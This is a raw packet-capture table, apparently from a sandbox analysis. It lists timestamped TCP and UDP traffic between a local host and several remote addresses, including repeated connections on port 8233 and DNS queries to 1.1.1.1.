Mar 24, 2025 14:44:05.625153065 CET	443	49765	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.625241995 CET	49765	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:05.625850916 CET	49765	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:05.625885963 CET	443	49765	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.787908077 CET	443	49764	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:05.788058043 CET	443	49764	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:05.788122892 CET	49764	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:05.788789034 CET	49764	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:05.788813114 CET	443	49764	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:05.790371895 CET	49763	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:05.792711973 CET	49766	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:05.792745113 CET	443	49766	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:05.792813063 CET	49766	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:05.792908907 CET	49766	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:05.792915106 CET	443	49766	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:05.926403046 CET	443	49765	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.926713943 CET	49765	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:05.926779985 CET	443	49765	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.926887035 CET	49765	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:05.926901102 CET	443	49765	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:05.984673977 CET	8233	49763	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:05.996298075 CET	443	49766	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:05.996640921 CET	49766	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:05.996664047 CET	443	49766	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:05.996783018 CET	49766	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:05.996788025 CET	443	49766	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:06.245105982 CET	443	49766	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:06.245266914 CET	443	49766	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:06.245333910 CET	49766	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:06.246006966 CET	49766	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:06.246023893 CET	443	49766	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:06.396862030 CET	443	49765	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:06.396950960 CET	443	49765	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:06.397015095 CET	49765	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:06.397862911 CET	49765	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:06.397883892 CET	443	49765	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:06.450566053 CET	49741	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:06.598664999 CET	8233	49741	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:11.059761047 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:11.212634087 CET	8233	49725	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:13.745008945 CET	49767	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:13.745064020 CET	443	49767	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:13.745151997 CET	49767	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:13.746001959 CET	49768	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:13.746213913 CET	49767	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:13.746226072 CET	443	49767	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:13.895263910 CET	8233	49768	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:13.895384073 CET	49768	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:13.895658970 CET	49768	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:14.045613050 CET	8233	49768	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:14.045874119 CET	49768	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:14.046411037 CET	49768	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:14.055912971 CET	443	49767	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.056154966 CET	49767	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:14.056184053 CET	443	49767	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.056325912 CET	49767	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:14.056334019 CET	443	49767	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.196146965 CET	8233	49768	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:14.196181059 CET	8233	49768	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:14.211642981 CET	49769	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:14.211692095 CET	443	49769	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:14.211764097 CET	49769	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:14.211966038 CET	49769	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:14.211982965 CET	443	49769	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:14.247714996 CET	49768	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:14.415025949 CET	443	49769	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:14.415647984 CET	49769	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:14.415688992 CET	443	49769	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:14.419554949 CET	49769	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:14.419568062 CET	443	49769	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:14.551290989 CET	443	49767	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.551388979 CET	443	49767	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.551445961 CET	49767	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:14.551979065 CET	49767	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:14.552004099 CET	443	49767	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.555176020 CET	49770	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:14.555221081 CET	443	49770	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.555290937 CET	49770	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:14.555429935 CET	49770	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:14.555442095 CET	443	49770	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.661587954 CET	443	49769	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:14.661655903 CET	443	49769	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:14.661737919 CET	49769	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:14.662461042 CET	49769	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:44:14.662482977 CET	443	49769	104.26.12.205	192.168.2.6
Mar 24, 2025 14:44:14.663417101 CET	49768	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:14.665469885 CET	49771	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:14.665513992 CET	443	49771	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:14.665604115 CET	49771	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:14.665740013 CET	49771	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:14.665747881 CET	443	49771	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:14.853858948 CET	8233	49768	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:14.854938030 CET	443	49770	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.855283022 CET	49770	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:14.855318069 CET	443	49770	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.855452061 CET	49770	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:14.855458021 CET	443	49770	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:14.866089106 CET	443	49771	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:14.866333961 CET	49771	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:14.866364002 CET	443	49771	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:14.866451025 CET	49771	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:14.866456985 CET	443	49771	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:15.115983963 CET	443	49771	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:15.116059065 CET	443	49771	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:15.116126060 CET	49771	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:15.117521048 CET	49771	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:44:15.117542982 CET	443	49771	172.67.74.152	192.168.2.6
Mar 24, 2025 14:44:15.334494114 CET	443	49770	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:15.334573030 CET	443	49770	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:15.334619045 CET	49770	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:15.335151911 CET	49770	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:44:15.335180044 CET	443	49770	104.168.138.190	192.168.2.6
Mar 24, 2025 14:44:15.858330965 CET	49772	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:44:15.858380079 CET	443	49772	142.251.40.196	192.168.2.6
Mar 24, 2025 14:44:15.858465910 CET	49772	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:44:15.858661890 CET	49772	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:44:15.858683109 CET	443	49772	142.251.40.196	192.168.2.6
Mar 24, 2025 14:44:16.051219940 CET	443	49772	142.251.40.196	192.168.2.6
Mar 24, 2025 14:44:16.051637888 CET	49772	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:44:16.051673889 CET	443	49772	142.251.40.196	192.168.2.6
Mar 24, 2025 14:44:18.872997046 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:19.023705006 CET	8233	49728	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:26.052460909 CET	443	49772	142.251.40.196	192.168.2.6
Mar 24, 2025 14:44:26.052546978 CET	443	49772	142.251.40.196	192.168.2.6
Mar 24, 2025 14:44:26.052716970 CET	49772	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:44:26.109369993 CET	49772	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:44:26.109388113 CET	443	49772	142.251.40.196	192.168.2.6
Mar 24, 2025 14:44:30.294291973 CET	49753	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:30.447026014 CET	8233	49753	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:38.997559071 CET	49758	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:39.148278952 CET	8233	49758	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:50.998050928 CET	49763	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:51.149164915 CET	8233	49763	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:51.606765032 CET	49741	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:51.755312920 CET	8233	49741	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:56.219235897 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:44:56.372360945 CET	8233	49725	185.174.100.76	192.168.2.6
Mar 24, 2025 14:44:59.856668949 CET	49768	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:00.005846977 CET	8233	49768	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:04.029802084 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:04.183784008 CET	8233	49728	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:05.085653067 CET	49773	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.085701942 CET	443	49773	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.085761070 CET	49773	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.086344004 CET	49774	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:05.086519957 CET	49773	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.086534977 CET	443	49773	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.234966993 CET	8233	49774	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:05.235053062 CET	49774	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:05.235445023 CET	49774	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:05.384167910 CET	8233	49774	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:05.384466887 CET	49774	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:05.384748936 CET	49774	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:05.403244972 CET	443	49773	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.403553009 CET	49773	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.403587103 CET	443	49773	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.403830051 CET	49773	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.403836012 CET	443	49773	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.532804012 CET	8233	49774	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:05.533466101 CET	8233	49774	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:05.536849022 CET	49775	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:05.536902905 CET	443	49775	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:05.536972046 CET	49775	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:05.537169933 CET	49775	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:05.537184954 CET	443	49775	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:05.576174974 CET	49774	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:05.739248991 CET	443	49775	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:05.739641905 CET	49775	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:05.739674091 CET	443	49775	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:05.739850998 CET	49775	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:05.739856005 CET	443	49775	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:05.976507902 CET	443	49773	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.976584911 CET	443	49773	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.976659060 CET	49773	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.977348089 CET	49773	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.977368116 CET	443	49773	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.980875015 CET	49776	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.980926037 CET	443	49776	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.981004953 CET	49776	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.981192112 CET	49776	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:05.981200933 CET	443	49776	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:05.984865904 CET	443	49775	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:05.985054970 CET	443	49775	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:05.985116005 CET	49775	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:05.992541075 CET	49775	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:05.992569923 CET	443	49775	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:05.993735075 CET	49774	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:06.097323895 CET	49777	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:06.097366095 CET	443	49777	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:06.097450972 CET	49777	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:06.097598076 CET	49777	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:06.097611904 CET	443	49777	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:06.184720993 CET	8233	49774	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:06.287584066 CET	443	49776	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:06.288130999 CET	49776	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:06.288162947 CET	443	49776	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:06.288480997 CET	49776	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:06.288486004 CET	443	49776	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:06.297684908 CET	443	49777	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:06.298099995 CET	49777	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:06.298137903 CET	443	49777	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:06.298289061 CET	49777	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:06.298296928 CET	443	49777	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:06.546122074 CET	443	49777	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:06.546184063 CET	443	49777	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:06.546236992 CET	49777	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:06.547523975 CET	49777	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:06.547549963 CET	443	49777	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:06.767905951 CET	443	49776	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:06.767987013 CET	443	49776	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:06.768063068 CET	49776	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:06.791335106 CET	49776	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:06.791378975 CET	443	49776	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.148221016 CET	49778	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.148261070 CET	443	49778	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.148332119 CET	49778	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.149466991 CET	49779	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:14.149854898 CET	49778	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.149861097 CET	443	49778	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.299491882 CET	8233	49779	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:14.299580097 CET	49779	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:14.299916029 CET	49779	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:14.452425003 CET	8233	49779	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:14.452698946 CET	49779	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:14.453166962 CET	49779	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:14.453628063 CET	443	49778	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.454461098 CET	49778	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.454498053 CET	443	49778	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.454935074 CET	49778	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.454943895 CET	443	49778	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.604784012 CET	8233	49779	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:14.604860067 CET	8233	49779	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:14.608097076 CET	49780	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:14.608163118 CET	443	49780	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:14.608268023 CET	49780	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:14.608449936 CET	49780	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:14.608464003 CET	443	49780	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:14.656143904 CET	49779	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:14.814834118 CET	443	49780	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:14.815160036 CET	49780	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:14.815196037 CET	443	49780	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:14.815396070 CET	49780	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:14.815402985 CET	443	49780	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:14.939132929 CET	443	49778	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.939217091 CET	443	49778	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.939285040 CET	49778	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.939892054 CET	49778	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.939908028 CET	443	49778	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.943558931 CET	49781	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.943592072 CET	443	49781	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:14.943681955 CET	49781	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.943809032 CET	49781	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:14.943814039 CET	443	49781	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:15.067019939 CET	443	49780	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:15.067094088 CET	443	49780	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:15.067192078 CET	49780	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:15.068157911 CET	49780	443	192.168.2.6	104.26.12.205
Mar 24, 2025 14:45:15.068178892 CET	443	49780	104.26.12.205	192.168.2.6
Mar 24, 2025 14:45:15.069256067 CET	49779	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:15.071774006 CET	49782	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:15.071825027 CET	443	49782	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:15.071916103 CET	49782	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:15.072124004 CET	49782	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:15.072135925 CET	443	49782	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:15.259515047 CET	8233	49779	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:15.265676022 CET	443	49781	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:15.266032934 CET	49781	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:15.266051054 CET	443	49781	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:15.266211033 CET	49781	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:15.266217947 CET	443	49781	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:15.270397902 CET	443	49782	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:15.270613909 CET	49782	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:15.270637035 CET	443	49782	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:15.270731926 CET	49782	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:15.270737886 CET	443	49782	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:15.450527906 CET	49753	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:15.515744925 CET	443	49782	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:15.515819073 CET	443	49782	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:15.515871048 CET	49782	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:15.521806955 CET	49782	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:45:15.521823883 CET	443	49782	172.67.74.152	192.168.2.6
Mar 24, 2025 14:45:15.599318027 CET	8233	49753	185.174.100.76	192.168.2.6
Mar 24, 2025 14:45:15.637104988 CET	49679	443	192.168.2.6	20.191.45.158
Mar 24, 2025 14:45:15.733326912 CET	443	49781	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:15.733414888 CET	443	49781	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:15.733462095 CET	49781	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:15.734051943 CET	49781	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:45:15.734066963 CET	443	49781	104.168.138.190	192.168.2.6
Mar 24, 2025 14:45:24.158489943 CET	49758	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:45:24.316404104 CET	8233	49758	185.174.100.76	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 14:42:11.216980934 CET	53	51879	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:11.382910967 CET	53	64768	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:12.196423054 CET	53	58265	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:12.220509052 CET	53	62628	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:15.732615948 CET	50706	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:15.732796907 CET	63156	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:15.830887079 CET	53	63156	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:15.831017017 CET	53	50706	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:16.794950962 CET	62002	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:16.795458078 CET	61274	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:16.983230114 CET	53	62002	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:17.069633007 CET	53	61274	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:18.301644087 CET	61545	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:18.301775932 CET	63661	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:18.591829062 CET	53	63661	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:18.596729994 CET	53	61545	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:19.947611094 CET	53	60832	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:20.567476034 CET	56137	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:20.567857981 CET	61429	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:20.665183067 CET	53	61429	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:20.666425943 CET	53	56137	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:21.449511051 CET	62037	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:21.449667931 CET	49476	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:21.547565937 CET	53	49476	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:21.551486969 CET	53	62037	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:21.941689968 CET	62917	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:21.941838026 CET	52073	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:22.040456057 CET	53	52073	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:22.040618896 CET	53	62917	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:29.158663034 CET	53	64395	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:39.126548052 CET	57959	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:39.126759052 CET	52487	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:39.417567968 CET	53	57959	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:39.519290924 CET	53	52487	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:40.076731920 CET	58625	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:40.076911926 CET	57743	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:40.179445982 CET	53	58625	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:40.179640055 CET	53	57743	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:40.708786011 CET	63858	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:40.709161043 CET	63803	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:40.807101011 CET	53	63858	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:40.808031082 CET	53	63803	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:47.570472956 CET	54635	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:47.570605993 CET	63974	53	192.168.2.6	1.1.1.1
Mar 24, 2025 14:42:47.907331944 CET	53	54635	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:47.917864084 CET	53	63974	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:48.210156918 CET	53	53217	1.1.1.1	192.168.2.6
Mar 24, 2025 14:42:58.819653988 CET	138	138	192.168.2.6	192.168.2.255
